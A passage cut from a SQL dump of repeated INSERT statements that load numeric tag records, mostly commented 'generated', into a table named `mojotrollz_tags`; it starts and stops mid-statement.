'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3995, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3995, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3996, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3996, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3998, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3999, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3999, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4001, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4002, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4003, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4003, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4004, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4004, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4005, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4005, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4006, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4006, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4007, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4007, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4008, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4008, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4009, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4009, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4011, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4011, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4012, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4012, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4013, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4013, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4014, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4014, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4015, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4015, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4016, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4016, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4017, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4017, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4018, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4018, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4019, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4019, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4020, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4020, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4021, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4021, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4022, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4022, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4023, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4023, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4024, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4024, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4025, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4025, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4026, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4026, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4027, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4027, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4028, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4028, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4029, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4029, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4030, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4030, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4031, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4031, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4032, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4032, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4034, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4034, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4035, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4035, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4036, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4036, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4037, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4037, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4038, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4038, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4040, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4040, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4041, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4041, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4042, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4042, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4043, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4043, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4043, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4043, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4043, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4043, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4044, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4044, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4046, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4046, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4047, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4047, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4047, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4047, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4047, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4047, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4048, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4048, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4049, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4049, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4049, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4049, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4049, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4050, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4050, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4051, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4051, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4052, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4052, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4053, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4053, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4054, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4054, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4056, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4056, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4057, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4057, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4059, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4061, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4061, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4062, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4062, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4063, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4063, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4064, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4064, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4065, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4065, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4066, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4066, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4067, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4067, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4068, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4070, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4070, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4072, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4072, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4073, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4073, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4074, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4074, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4075, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4075, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4076, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4076, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4077, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4077, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4078, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4078, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4079, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4079, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4080, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4080, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4081, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4081, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4082, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4082, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4083, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4083, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4084, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4084, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4085, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4085, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4086, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4086, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4087, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4087, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4088, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4088, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4089, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4089, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4090, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4090, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4091, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4091, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4092, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4092, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4093, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4093, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4094, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4094, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4095, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4095, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4096, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4096, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4097, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4097, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4099, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4099, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4100, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4100, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4101, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4101, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4104, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4104, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4107, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4107, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4109, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4109, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4110, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4110, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4111, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4111, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4112, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4112, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4113, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4114, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4114, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4116, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4116, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4117, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4118, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4118, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4119, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4119, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4120, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4120, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4124, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4124, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4126, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4126, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4127, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4127, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4127, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4127, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4127, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4128, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4128, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4129, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4129, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4130, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4130, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4131, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4131, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, 